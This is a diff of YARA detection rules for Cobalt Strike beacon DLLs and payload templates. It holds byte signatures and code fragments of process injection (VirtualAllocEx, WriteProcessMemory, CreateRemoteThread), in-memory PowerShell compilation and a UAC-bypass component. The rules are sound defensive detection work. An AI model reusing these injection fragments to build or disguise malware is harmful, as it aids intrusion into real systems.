-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1407-L1440"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L213-L243"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "945e10dcd57ba23763481981c6035e0d0427f1d3ba71e75decd94b93f050538e"
-		logic_hash = "81571a6c30802430d0df9980e005736d58464bde98c0889b48bf8d0c7e88d247"
+		hash = "ed08c1a21906e313f619adaa0a6e5eb8120cddd17d0084a30ada306f2aca3a4e"
+		logic_hash = "3616579dabcfd0ba413d17b4fbd0da5313b9beca94f7bf8e41f05d6679b4a215"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 48 8D 0D 01 5B FF FF 48 83 C4 28 E9 A8 54 FF FF 8B D0
-                     49 8B CA E8 22 55 FF FF }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
+		$version_sig = { 83 F8 22 0F 87 96 01 00 00 FF 24 }
+		$decoder = { B1 ?? EB 03 8D 49 00 30 88 [4] 40 3D 30 05 00 00 72 F2  }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_14
+rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V2_1_And_V2_2
 {
 	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.14"
+		description = "Cobalt Strike's resources/beacon.dll Versions 2.1 and 2.2"
 		author = "gssincla@google.com"
-		id = "d69171e3-86f4-5187-8874-5eee2045f746"
+		id = "384fb247-aae7-52e1-a45d-6bda0f80a04e"
 		date = "2022-11-18"
 		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1442-L1477"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L245-L276"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "297a8658aaa4a76599a7b79cb0da5b8aa573dd26c9e2c8f071e591200cf30c93"
-		logic_hash = "87cf465154d4294eeda9cf99c6c160da80cfa8a65244bc083737c0c87163431d"
+		hash = "ae7a1d12e98b8c9090abe19bcaddbde8db7b119c73f7b40e76cdebb2610afdc2"
+		logic_hash = "eee3702d6fde08b8e9f5533f903fa33fb3da808a3b76ca43e4d5029f9ce91ad0"
 		score = 75
 		quality = 85
 		tags = ""
-		rs2 = "39b9040e3dcd1421a36e02df78fe031cbdd2fb1a9083260b8aedea7c2bc406bf"
 
 	strings:
-		$version_sig = { 8B D0 49 8B CA 48 83 C4 28 E9 B1 1F 00 00 8B D0 49 8B CA
-                     48 83 C4 28 }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
+		$version_sig = { 49 56 57 83 F9 24 0F 87 8A 01 00 00 FF 24 }
+		$decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Sleeve_Beacon_Dll_X86_V4_0_Suspected
+rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V2_3
 {
 	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 4.0 (suspected, not confirmed)"
+		description = "Cobalt Strike's resources/beacon.dll Versions 2.3"
 		author = "gssincla@google.com"
-		id = "28a735c4-87d1-5e14-9379-46a6fd0cdd2a"
+		id = "aed092f1-fbb1-5efe-be8d-fb7c5aba1cde"
 		date = "2022-11-18"
 		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1480-L1515"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L278-L308"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "55aa2b534fcedc92bb3da54827d0daaa23ece0f02a10eb08f5b5247caaa63a73"
-		logic_hash = "0dbf6a75dc74f4c2a7604072a01e2dbaaee15f5e57c765f24138d85c248fb305"
+		hash = "00dd982cb9b37f6effb1a5a057b6571e533aac5e9e9ee39a399bb3637775ff83"
+		logic_hash = "286d7ffa83634b82160788abaf1c5b319a09c4a1243af2401799f327be76ad75"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 41 B8 01 00 00 00 8B D0 49 8B CA 48 83 C4 28 E9 D1 B3 FF FF
-                     8B D0 49 8B CA 48 83 C4 28 E9 AF F5 FF FF 45 33 C0
-                     4C 8D 0D 8D 70 FF FF 8B D0 49 8B CA E8 9B B0 FF FF }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
+		$version_sig = { 49 56 57 83 F9 26 0F 87 A9 01 00 00 FF 24 }
+		$decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Sleeve_Beacon_X64_V4_1_And_V_4_2
+rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V2_4
 {
 	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 4.1 and 4.2"
+		description = "Cobalt Strike's resources/beacon.dll Versions 2.4"
 		author = "gssincla@google.com"
-		id = "dc320d17-98fc-5df3-ba05-4d134129317e"
+		id = "347a6b06-84a8-53ff-80a1-05fa1a48a412"
 		date = "2022-11-18"
 		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1517-L1553"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L310-L340"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "29ec171300e8d2dad2e1ca2b77912caf0d5f9d1b633a81bb6534acb20a1574b2"
-		logic_hash = "9b262ec18f79ab5ae63ad26d3685af088b5feb2d66de6ad3ba584cafbe2ee221"
+		hash = "78c6f3f2b80e6140c4038e9c2bcd523a1b205d27187e37dc039ede4cf560beed"
+		logic_hash = "087ec6f585e90b84c00e746beb37cb8365cb7b4d07ebd0c48e3ba3d5df94dba2"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 83 F9 34 0F 87 8E 03 00 00 0F 84 7A 03 00 00 83 F9 1C 0F 87 E6 01 00 00
-                     0F 84 D7 01 00 00 83 F9 0E 0F 87 E9 00 00 00 0F 84 CE 00 00 00 FF C9
-                     0F 84 B8 00 00 00 83 E9 02 0F 84 9F 00 00 00 FF C9 }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
+		$version_sig = { 4A 56 57 83 FA 2F 0F 87 F9 01 00 00 FF 24 }
+		$decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Sleeve_Beacon_X64_V4_3
+rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V2_5
 {
 	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Version 4.3"
+		description = "Cobalt Strike's resources/beacon.dll Versions 2.5"
 		author = "gssincla@google.com"
-		id = "572616c7-d1ec-5aa1-b142-4f2edf73737f"
+		id = "a89f9239-099c-5b97-b1df-e8ce2b95ea52"
 		date = "2022-11-18"
 		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1555-L1590"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L342-L372"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "3ac9c3525caa29981775bddec43d686c0e855271f23731c376ba48761c27fa3d"
-		logic_hash = "0c8934e997583339145749a3167ac010d8c77b2ed878d2c999de68ec2a98101d"
+		hash = "d99693e3e521f42d19824955bef0cefb79b3a9dbf30f0d832180577674ee2b58"
+		logic_hash = "f2d0ca1414a60bf855543d99777ae5e83c451db41aba5e255e4c10b1e0bb7b47"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 8B D0 49 8B CA 48 83 C4 28 E9 D3 88 FF FF
-                     4C 8D 05 84 6E FF FF 8B D0 49 8B CA 48 83 C4 28 }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
+		$version_sig = { 48 57 8B F2 83 F8 3A 0F 87 6E 02 00 00 FF 24 }
+		$decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Sleeve_Beacon_X64_V4_4_V_4_5_And_V4_6
+rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_0
 {
 	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 4.4 through at least 4.6"
+		description = "Cobalt Strike's resources/beacon.dll Versions 3.0"
 		author = "gssincla@google.com"
-		id = "79b6bfd4-1e45-5bd9-ac5c-19eb176ce698"
+		id = "132a1be8-f529-5141-ba03-fdf6df3d55d4"
 		date = "2022-11-18"
 		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1593-L1628"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L374-L404"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "3280fec57b7ca94fd2bdb5a4ea1c7e648f565ac077152c5a81469030ccf6ab44"
-		logic_hash = "be0bbf58a176f8089924b3ce58268d906f49dde51d863524971e46f4bada43a3"
+		hash = "30251f22df7f1be8bc75390a2f208b7514647835f07593f25e470342fd2e3f52"
+		logic_hash = "951f1b52c14010261022f9f920d53d3c1e88f41461798a23e72083c981f9de76"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 8B D0 49 8B CA 48 83 C4 28 E9 83 88 FF FF
-                     4C 8D 05 A4 6D FF FF 8B D0 49 8B CA 48 83 C4 28 }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
+		$version_sig = { 48 57 8B F2 83 F8 3C 0F 87 89 02 00 00 FF 24 }
+		$decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Sleeve_Beacon_X64_V4_5_Variant
+rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_1
 {
 	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 4.5 (variant)"
+		description = "Cobalt Strike's resources/beacon.dll Versions 3.1"
 		author = "gssincla@google.com"
-		id = "45715da9-8f16-5304-b216-1ca36c508c77"
+		id = "aa511dee-69ea-53bd-be90-d2d03d08c550"
 		date = "2022-11-18"
 		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1630-L1665"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L406-L461"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "8f0da7a45945b630cd0dfb5661036e365dcdccd085bc6cff2abeec6f4c9f1035"
-		logic_hash = "31a108168489a24d1bc297d722741f3fd19abd1bed4c76d54967c73986d18123"
+		hash = "4de723e784ef4e1633bbbd65e7665adcfb03dd75505b2f17d358d5a40b7f35cf"
+		logic_hash = "2d91add3aefe69b4525f93f7ea9f2fcbd7a6c506a224997ff73a2eeef63a8cd4"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 41 B8 01 00 00 00 8B D0 49 8B CA 48 83 C4 28 E9 E8 AB FF FF
-                     8B D0 49 8B CA E8 1A EB FF FF 48 83 C4 28 }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
+		$version_sig = { 55 8B EC 83 EC 58 A1 [4] 33 C5 89 45 FC E8 DF F5 FF FF 6A 50 8D 45 A8 50 FF 15 [4] 8D 45 ?? 50 FF 15 [4] 85 C0 74 14 8B 40 0C 83 38 00 74 0C 8B 00 FF 30 FF 15 [4] EB 05 B8 [4] 8B 4D FC 33 CD E8 82 B7 00 00 C9 }
+		$decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Template__X32_X64_Ps1_V1_45_To_V2_5_And_V3_11_To_V3_14
+rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_2
 {
 	meta:
-		description = "Cobalt Strike's resources/template.x64.ps1, resources/template.x32 from v3.11 to v3.14 and resources/template.ps1 from v1.45 to v2.5 "
+		description = "Cobalt Strike's resources/beacon.dll Versions 3.2"
 		author = "gssincla@google.com"
-		id = "c9fa6a39-0098-5dde-9762-94bc6b2df299"
+		id = "3ccbc0f2-241c-5c10-8930-4a3d264d3b57"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template__x32_x64_Ps1_v1_45_to_v2_5_and_v3_11_to_v3_14.yara#L17-L43"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L463-L528"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "ff743027a6bcc0fee02107236c1f5c96362eeb91f3a5a2e520a85294741ded87"
-		logic_hash = "5196f111f257239d2e7e4ca342e7fc8bac1687743bc8c7ff23addf1f094b2e93"
+		hash = "b490eeb95d150530b8e155da5d7ef778543836a03cb5c27767f1ae4265449a8d"
+		logic_hash = "e1fe0d58d86ad8c845d65608314007ce08e3e524fb92cdb33ddae860c640e3e9"
 		score = 75
 		quality = 85
 		tags = ""
+		rs2 = "a93647c373f16d61c38ba6382901f468247f12ba8cbe56663abb2a11ff2a5144"
 
 	strings:
-		$importVA = "[DllImport(\"kernel32.dll\")] public static extern IntPtr VirtualAlloc" nocase
-		$importCT = "[DllImport(\"kernel32.dll\")] public static extern IntPtr CreateThread" nocase
-		$importWFSO = "[DllImport(\"kernel32.dll\")] public static extern int WaitForSingleObject" nocase
-		$compiler = "New-Object Microsoft.CSharp.CSharpCodeProvider" nocase
-		$params = "New-Object System.CodeDom.Compiler.CompilerParameters" nocase
-		$paramsSys32 = ".ReferencedAssemblies.AddRange(@(\"System.dll\", [PsObject].Assembly.Location))" nocase
-		$paramsGIM = ".GenerateInMemory = $True" nocase
-		$result = "$compiler.CompileAssemblyFromSource($params, $assembly)" nocase
+		$version_sig = { 48 57 8B F2 83 F8 3D 0F 87 83 02 00 00 FF 24 }
+		$decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 }
+		$version3_1_sig = { 55 8B EC 83 EC 58 A1 [4] 33 C5 89 45 FC E8 DF F5 FF FF 6A 50 8D 45 A8 50 FF 15 [4] 8D 45 ?? 50 FF 15 [4] 85 C0 74 14 8B 40 0C 83 38 00 74 0C 8B 00 FF 30 FF 15 [4] EB 05 B8 [4] 8B 4D FC 33 CD E8 82 B7 00 00 C9 }
 
 	condition:
-		all of them
+		$version_sig and $decoder and not $version3_1_sig
 }
-rule GCTI_Cobaltstrike_Resources_Template_X86_Vba_V3_8_To_V4_X
+rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_3
 {
 	meta:
-		description = "Cobalt Strike's resources/template.x86.vba signature for versions v3.8 to v4.x"
+		description = "Cobalt Strike's resources/beacon.dll Versions 3.3"
 		author = "gssincla@google.com"
-		id = "11c7758e-93b2-5fe3-873d-b98de579d2b4"
+		id = "7cce26c9-1403-535f-bd9d-19667c7e313c"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_x86_Vba_v3_8_to_v4_x.yara#L17-L37"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L530-L560"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "fc66cb120e7bc9209882620f5df7fdf45394c44ca71701a8662210cf3a40e142"
-		logic_hash = "7114515477d82651806eccef34f599f6ffd4614f987dee29417ac6ef7a1a1c38"
+		hash = "158dba14099f847816e2fc22f254c60e09ac999b6c6e2ba6f90c6dd6d937bc42"
+		logic_hash = "f9b9b669aacc156a4e07eab0c6a638f9b9d828e018d1db89e9e2c922641744ac"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$createstuff = "Function CreateStuff Lib \"kernel32\" Alias \"CreateRemoteThread\"" nocase
-		$allocstuff = "Function AllocStuff Lib \"kernel32\" Alias \"VirtualAllocEx\"" nocase
-		$writestuff = "Function WriteStuff Lib \"kernel32\" Alias \"WriteProcessMemory\"" nocase
-		$runstuff = "Function RunStuff Lib \"kernel32\" Alias \"CreateProcessA\"" nocase
-		$vars = "Dim rwxpage As Long" nocase
-		$res = "RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)"
-		$rwxpage = "AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)"
+		$version_sig = { 48 57 8B F1 83 F8 41 0F 87 F0 02 00 00 FF 24 }
+		$decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 }
 
 	condition:
-		all of them and @vars [ 1 ] < @res [ 1 ] and @allocstuff [ 1 ] < @rwxpage [ 1 ]
+		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Bypassuactoken_X64_Dll_V3_11_To_V3_14
+rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_4
 {
 	meta:
-		description = "Cobalt Strike's resources/bypassuactoken.x64.dll from v3.11 to v3.14 (64-bit version)"
+		description = "Cobalt Strike's resources/beacon.dll Versions 3.4"
 		author = "gssincla@google.com"
-		id = "c89befcd-a622-5947-9ce3-a6031901a45a"
+		id = "58a34ab6-c061-59a2-b929-8519d3d844e7"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bypassuactoken_x64_Dll_v3_11_to_v3_14.yara#L17-L118"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L562-L592"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "853068822bbc6b1305b2a9780cf1034f5d9d7127001351a6917f9dbb42f30d67"
-		logic_hash = "adfd212f2e470f666ab8a2168e976c11d3032c31dab7cf56963dae5fc0f6c5f9"
+		hash = "5c40bfa04a957d68a095dd33431df883e3a075f5b7dea3e0be9834ce6d92daa3"
+		logic_hash = "f3372bc538092e30c62d9599f76f2115dc73faf7a5fd6f86c8d4cfaa35473810"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$isHighIntegrityProcess = {
-			83 ?? 7A
-			75 ??
-			8B [3]
-			33 ??
-			FF 15 [4]
-			44 [4]
-			8D [2]
-			48 8B ??
-			48 8D [3]
-			48 8B ??
-			4C 8B ??
-			48 89 [3]
-			FF 15 [4]
-			85 C0
-			74 ??
-			48 8B ??
-			FF 15 [4]
-			8D [2]
-			8A ??
-			40 [2]
-			0F B6 D1
-			48 8B 0F
-			FF 15 [4]
-			81 ?? 00 30 00 00
-		}
-		$executeTaskmgr = {
-			44 8D ?? 70
-			48 8D [3]
-			E8 [4]
-			83 [3] 00
-			48 8D [5]
-			0F 57 ??
-			66 0F 7F [3]
-			48 89 [3]
-			48 8D [5]
-			48 8D [3]
-			C7 [3] 70 00 00 00
-			C7 [3] 40 00 00 00
-			48 89 [3]
-			FF 15
-		}
+		$version_sig = { 48 57 8B F1 83 F8 42 0F 87 F0 02 00 00 FF 24 }
+		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Template_Sct_V3_3_To_V4_X
+rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_5_Hf1_And_3_5_1
 {
 	meta:
-		description = "Cobalt Strike's resources/template.sct signature for versions v3.3 to v4.x"
+		description = "Cobalt Strike's resources/beacon.dll Versions 3.5-hf1 and 3.5.1 (3.5.x)"
 		author = "gssincla@google.com"
-		id = "9d2b1dfa-5f76-503f-9198-6ed0d039e0cb"
+		id = "1532596e-be0e-58c2-8d3b-5120c793d677"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_Sct_v3_3_to_v4_x.yara#L17-L38"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L594-L625"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "fc66cb120e7bc9209882620f5df7fdf45394c44ca71701a8662210cf3a40e142"
-		logic_hash = "8868445ced4945c469764b7f311d6cb11c99cf0f2d770113e5e617e0187a962c"
+		hash = "c78e70cd74f4acda7d1d0bd85854ccacec79983565425e98c16a9871f1950525"
+		logic_hash = "c2e975678815638803b04261d46bca216bc0b2f894a1f72fd0d5b949493401d1"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$scriptletstart = "<scriptlet>" nocase
-		$registration = "<registration progid=" nocase
-		$classid = "classid=" nocase
-		$scriptlang = "<script language=\"vbscript\">" nocase
-		$cdata = "<![CDATA["
-		$scriptend = "</script>" nocase
-		$antiregistration = "</registration>" nocase
-		$scriptletend = "</scriptlet>"
+		$version_sig = { 48 57 8B F1 83 F8 43 0F 87 07 03 00 00 FF 24 }
+		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
 
 	condition:
-		all of them and @scriptletstart [ 1 ] < @registration [ 1 ] and @registration [ 1 ] < @classid [ 1 ] and @classid [ 1 ] < @scriptlang [ 1 ] and @scriptlang [ 1 ] < @cdata [ 1 ]
+		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Browserpivot_X64_Bin_V1_48_To_V3_14_And_Sleeve_Browserpivot_X64_Dll_V4_0_To_V4_X
+rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_6
 {
 	meta:
-		description = "Cobalt Strike's resources/browserpivot.x64.bin from v1.48 to v3.14 and sleeve/browserpivot.x64.dll from v4.0 to at least v4.4"
+		description = "Cobalt Strike's resources/beacon.dll Versions 3.6"
 		author = "gssincla@google.com"
-		id = "a5dfae85-ff9c-5ca5-9ac0-041c6108a6ed"
+		id = "7e7b5c22-82b3-5298-b794-b06d94a668d5"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Browserpivot_x64_Bin_v1_48_to_v3_14_and_Sleeve_Browserpivot_x64_Dll_v4_0_to_v4_x.yara#L17-L64"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L627-L657"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "0ad32bc4fbf3189e897805cec0acd68326d9c6f714c543bafb9bc40f7ac63f55"
-		logic_hash = "a59f19b6e258b724ed88b4255717d066319ba5fb0838d6c6ed11355e9d9b1c22"
+		hash = "495a744d0a0b5f08479c53739d08bfbd1f3b9818d8a9cbc75e71fcda6c30207d"
+		logic_hash = "3bd3f0b8625e131726fa92d68de041dae6c3d5642cbf22ac596d1d82da1d4a07"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$socket_recv = {
-			FF 15 [4]
-			83 ?? FF
-			74 ??
-			85 ??
-			74 ??
-			03 ??
-			83 ?? 02
-			72 ??
-			8D ?? FF
-			80 [2] 0A
-			75 ??
-			8D ?? FE
-			80 [2] 0D
-		}
-		$fmt = "%1024[^ ] %8[^:]://%1016[^/]%7168[^ ] %1024[^ ]"
+		$version_sig = { 48 57 8B F9 83 F8 47 0F 87 2F 03 00 00 FF 24 }
+		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Xor_Bin_V2_X_To_V4_X
+rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_7
 {
 	meta:
-		description = "Cobalt Strike's resource/xor.bin signature for version 2.x through 4.x"
+		description = "Cobalt Strike's resources/beacon.dll Versions 3.7"
 		author = "gssincla@google.com"
-		id = "1754746c-3a42-5f7d-808a-ba2e1c0a270e"
+		id = "6352a31c-34b8-5886-8e34-ef9221c22e6e"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Xor_Bin__32bit_v2_x_to_4_x.yara#L17-L36"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L659-L689"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
